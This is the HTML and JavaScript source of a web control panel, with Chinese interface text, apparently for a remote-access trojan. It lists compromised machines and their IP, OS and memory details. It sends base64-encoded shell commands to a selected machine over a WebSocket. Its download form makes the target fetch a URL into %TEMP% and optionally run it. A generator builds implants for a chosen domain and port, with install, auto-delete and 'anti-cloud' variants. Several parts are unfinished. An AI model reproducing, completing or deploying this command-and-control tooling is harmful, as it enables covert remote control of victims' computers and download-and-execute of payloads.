<!DOCTYPE html>
<html lang="zh">

<head>
    <meta charset="utf-8">
    <title>Manager</title>
    <link rel="stylesheet" type="text/css" href="/static/css/bootstrap.css">
    <script src="/static/js/jquery-3.3.1.js"></script>
    <script src="/static/js/bootstrap.js"></script>
    <script src="/static/js/base64.js"></script>
    <style>
        .btn {
            text-align: center;
            height: 30px;
            width: 100px;
        }
        .black_overlay{
            display: none;
            position: absolute;
            top: 0%;
            left: 0%;
            width: 100%;
            height: 100%;
            background-color: black;
            z-index:1001;
            -moz-opacity: 0.8;
            opacity:.80;
            filter: alpha(opacity=88);
        }
        .white_content {
            display: none;
            position: absolute;
            top: 25%;
            left: 25%;
            width: 55%;
            height: 55%;
            padding: 20px;
            border: 10px solid orange;
            background-color: white;
            z-index:1002;
            overflow: auto;
        }
    </style>

    <script>
        var u  = prompt("username：", "admin");
        var p = prompt("password：", "123456");
        var base = new Base64();
        var loc = window.location;
        var uri = 'ws:';
        var nowhandle = '';
        var nowip = '';
        if (loc.protocol === 'https:') {
            uri = 'wss:';
        }
        uri += '//127.0.0.1:3287';

        alert(uri)
        ws = new WebSocket(uri);
        ws.onopen = function () {
            ws.send(JSON.stringify({"username":u,"password":p}));


        };
            ws.onmessage = function (evt) {
                console.log(evt.data);
                let data = JSON.parse(evt.data)
                if(data["login"]===true){
                    $("#log").append("<p style='color:blue'>后端连接成功</p>")
                    for(let i=0;i<data["data"];i++){

                    }
                }
                if(data["action"]==="online"){

                }
                // let flag = msg[0];
                // let uuid = msg[1];
                // let iip = msg[2];
                // let ip = msg[3];
                // let memory = msg[4];
                // let os = msg[5];
                // let name = msg[6]
                // if (flag === "add") {
                //     $("#server_list").append(
                //         `<tr id="`+uuid+`">
                //             <td><label>
                //             <input type="checkbox" name="category" value="`+uuid+`"/>
                //             </label></td>
                //             <td>`+iip+`</td>
                //             <td>`+name+`</td>
                //             <td>`+os+`</td>
                //             <td>`+memory+`</td>
                //             <td>`+ip+`</td>
                //             <td><a href="javascript:new_cmd('${iip}','${uuid}');">终端</a> <a href="javascript:download('${iip}','${uuid}');" >下载</a> <a href="#">卸载</a></td>
                //             `
                //     );
                //     $("#log").append("<p style='color:green'>客户上线："+iip+"</p>")
                // }else if (flag === "remove"){
                //     $(`#`+uuid).remove();
                //     $("#log").append("<p style='color:red'>客户下线："+iip+"</p>")
                // }else if (flag === "log"){
                //
                // }else if (flag === "config"){
                //     $("#log").append("<p style='color:blue'>Web控制台端口"+msg[1]+" 服务监听端口"+msg[2]+"</p>")
                // }else if (flag === "out"){
                //     let cmd = msg[2];
                //     console.log(base.decode(cmd))
                //     $(`#cmd_textarea`).val($(`#cmd_textarea`).val()+base.decode(cmd));
                //     $("#cmd_textarea").scrollTop($("#cmd_textarea")[0].scrollHeight);
                //
                // }


        };
        ws.onclose = function () {
            $("#log").append("<p style='color:red'>后端连接失败</p>")
            $("#light").css("display","none");
            $("#fade").css("display","none");
        };
        $(function(){
        $("#cmd_input").keydown(function(event){
            if(event.keyCode === 13){

                ws.send("shell|"+nowhandle+"|"+base.encode($("#cmd_input").val()));
                $("#cmd_input").val("")
            }
        });});
    </script>
    <script>
        function generate(){
            $("#generate").css("display","block");
            $("#fade").css("display","block");
        }
        function generate_close(){
            // document.getElementById('light').style.display='none';
            // document.getElementById('fade').style.display='none';
            $("#generate").css("display","none");
            $("#fade").css("display","none");
            ws.send("shell|"+nowhandle+"|"+base.encode("reset"));
        }
        function download_close(){
            // document.getElementById('light').style.display='none';
            // document.getElementById('fade').style.display='none';
            $("#download").css("display","none");
            $("#fade").css("display","none");
            ws.send("shell|"+nowhandle+"|"+base.encode("reset"));
        }
        function download(ip,id) {
             $("#download").css("display","block");
            $("#fade").css("display","block");
            if (nowhandle != id){
                $("#cmd_textarea").val("")
            }
            nowhandle=id;

            nowip=ip;
        }
        function cmd_close(){
            // document.getElementById('light').style.display='none';
            // document.getElementById('fade').style.display='none';
            $("#light").css("display","none");
            $("#fade").css("display","none");
            ws.send("shell|"+nowhandle+"|"+base.encode("reset"));
        }
        function new_cmd(ip,id) {
            // document.getElementById('light').style.display='block';
            // document.getElementById('fade').style.display='block';
            $("#light").css("display","block");
            $("#fade").css("display","block");
            nowhandle=id;
            nowip=ip;
            console.log(id);
            $("#IP").html("目前控制的是："+ip);
            ws.send("shell|"+id)
        }


        function down_btu_on(){
            if($("#http_address").val()==""){
                $("#error_http_address").html("网址不能为空");
                return;
            }
            if ($("#save_path").val()==""){
                $("#error_save_path").html("将写入默认目录");
                $("#save_path").val("%TEMP%")
            }
            ws.send("download|"+nowhandle+"|"+encodeURI($("#http_address").val())+"|"+$("#save_path").val()+"|"+$("#is_run").val());
            $("#d_res").html("发送成功");
        }

        function generate_btu_on(){
            if($("#domain").val()==""){
                $("#error_domain").html("域名不能为空");
                return;
            }
            if ($("#port").val()==""){
                $("#error_port").html("端口不能为空");
                return;
            }
            window.open("/generate?domain="+$("#domain").val()+"&port="+$("#port").val()+"&version="+$("#version").val(), "_blank");
        }
    </script>

</head>
<div>
    <div class="page-header">
        <h2 class="text-center">Manager</h2>
    </div>
    <div id="control" class="text-center">
        <div id="cur_ip"></div>
        <br>
        <button id="btn_refresh" type="button" class="btn btn-success">Refresh</button>
        <button id="btn_Down" type="button" class="btn btn-primary">Download</button>
<!--         <button id="btn_OpenUrl" type="button" class="btn btn-primary">OpenUrl</button> -->
        <button id="btn_del" type="button" class="btn btn-danger">Delete</button>
        <button id="btn_gen" type="button" class="btn btn-info" onclick="generate();">Generate</button>
    </div>
    <br>
<!--    <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">-->
<!--        <div class="modal-dialog">-->
<!--            <div class="modal-content">-->
<!--                <div class="modal-header">-->
<!--                    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>-->
<!--                    <h4 class="modal-title" id="myModalLabel">远程终端</h4>-->
<!--                </div>-->
<!--                <div class="modal-body" style="text-align: center;">-->
<!--                    <div>-->
<!--                        <label>-->
<!--                            <textarea class="form-control" rows="3" style="width: 80%"></textarea>-->
<!--                        </label>-->
<!--                    </div>-->
<!--                </div>-->
<!--                <div class="modal-footer">-->
<!--                    <button type="button" class="btn btn-default" data-dismiss="modal">关闭</button>-->
<!--                    <button type="button" class="btn btn-primary">提交更改</button>-->
<!--                </div>-->
<!--            </div>-->
<!--        </div>-->
<!--    </div>-->
    <div >
        <table id="server_list" border="1" width="80%" style="margin-left: 10%;margin-right: 10%;text-align: center">
            <tr id="title">
                <td></td>
                <td>IP</td>
                <td>Computer Name</td>
                <td>OS</td>
                <td>Memory</td>
                <td>Intranet IP</td>
                <td>Action</td>
            </tr>
            <tr id="s1">
                <td><label>
                        <input type="checkbox" name="category" value="s1"/>
                    </label></td>
                <td>1.1.1.1</td>
                <td>Windows 10</td>
                <td>Total 15.76 GB (7.59 GB available)</td>
                <td>192.168.0.7</td>
                <td><a href="#">终端</a> <a href="#">下载</a> <a href="#">卸载</a></td>
            </tr>
        </table>
    </div>
    <div id="div_log" width="80%" style="margin-left:10%;margin-right:11%;text-align:left;margin-top: 50px;max-height: 20%">
        <h2>日志</h2>
        <div id="log" style="border-style:solid; border-width:1px; border-color:#000;">
        </div>
    </div>
    <div id="title_bar" width="80%" style="margin-left:10%;margin-right:11%;text-align:center;margin-top: 50px;max-height: 20%">
        <!-- <ul id="myTab" class="nav nav-tabs">
        </ul> -->

    </div>


</div>
<div id="light" class="white_content">Cmd Shell

        <a href = "javascript:void(0)" onclick = "cmd_close();" style="text-align: right;">关闭</a>

            <p id="IP">目前控制的是：</p>
            <div style="text-align: center;" id="cmdcommand" class="tab-pane fade in active">
                <label>
                    <textarea id="cmd_textarea" rows="15"  style="width: 95%" disabled="disabled"></textarea>
                </label>
                <label>
                    <input id="cmd_input" type="text" class="form-control" style="width: 95%">
                </label>
            </div>
</div>

<div id="download" class="white_content">Web Download
    <a href = "javascript:void(0)" onclick = "download_close();">关闭</a>
    <p>注意路径转义，也就是d:\要写成d:\\才醒否则程序炸了后果自负</p>
    <br>
    远程地址：<input id="http_address" type="text"> <p id="error_http_address" style="color:red"></p>
    <br>
    保存路径：<input id="save_path" type="text"><p id="error_save_path" style="color:red"></p>
    <br>
    是否运行：<select id="is_run">

    <option  value="yes">是</option>
    <option value="no">否</option>
    </select>
    <br>
    <button id="download_btu" aligh="right" onclick="down_btu_on()">下载</button>
    <p id="d_res"></p>



</div>

<div id="generate" class="white_content">Generate
    <a href = "javascript:void(0)" onclick = "generate_close();">关闭</a>
    <h3>域名：</h3><input type="text" id="domain" value=""><p id="error_domain" style="color:red"></p>
    <br>
    <h3>后端端口：</h3><input type="text" id="port" value=""><p id="error_port" style="color:red"></p>
    <p>必须要是后端，而不是当前网址访问的Web端，详细信息看下面的日志</p>
    <br>
    <h3>版本</h3>
    <select id="version">
        <option value="onlyRun">仅运行</option>
        <option value="default">安装</option>
        <option value="autoRemove">安装后自动删除</option>
        <option value="antiCloud">防云不删除</option>
        <option value="full">全要</option>
    </select>
    <br>
    <button id="generate_btu" aligh="right" onclick="generate_btu_on()">生成</button>
    <br>
    <p>只写了仅运行和安装，其他都还没写</p>
</div>
<div id="fade" class="black_overlay"></div>
<body>

</body>

</html>